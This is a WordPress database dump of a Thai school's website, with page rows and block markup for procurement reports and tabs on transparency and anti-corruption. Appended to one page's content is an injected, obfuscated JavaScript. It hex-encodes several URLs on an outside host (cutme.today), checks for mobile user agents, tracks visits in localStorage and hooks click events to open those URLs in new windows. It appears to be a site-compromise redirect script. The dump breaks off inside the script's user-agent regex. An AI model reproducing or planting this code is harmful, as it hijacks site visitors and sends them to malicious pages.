_background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://docs.google.com/spreadsheets/d/18Al9i8m54QFeeHUxK9Yr6AVWTM3sifGz/edit?usp=sharing&#038;ouid=116408890257525538205&#038;rtpof=true&#038;sd=true[/embedpress]','รายงานการจัดซื้อจัดจ้างหรือจัดหาพัสดุ ปีงบประมาณ 2567','','publish','closed','closed','','elementor-1571','','','2025-07-15 08:33:05','2025-07-15 01:33:05','',0,'http://pakhaeng.ssk.in.th/?page_id=1571',0,'page','',0),
(1572,1,'2025-07-01 14:32:15','2025-07-01 07:32:15','','Elementor #1571','','inherit','closed','closed','','1571-revision-v1','','','2025-07-01 14:32:15','2025-07-01 07:32:15','',1571,'http://pakhaeng.ssk.in.th/?p=1572',0,'revision','',0),
(1573,1,'2025-07-01 14:34:13','2025-07-01 07:34:13','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":1259,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2025.png\" alt=\"\" title=\"2025\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"currentTab\":3,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#f78da7\",\"titleBgHover\":\"#cf2e2e\",\"titleBgActive\":\"#cf2e2e\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#f78da7\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-3 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"cda4f9-0b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tabcda4f9-0b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469↗\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"size\":16,\"width\":4,\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"e71bc9-b1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tabe71bc9-b1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"bab0c3-88\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tabbab0c3-88\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1558\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"942a96-06\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab942a96-06\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1502\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"42916d-7b\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab42916d-7b\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"357ff8-b0\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab357ff8-b0\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"77d9b7-d1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab77d9b7-d1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 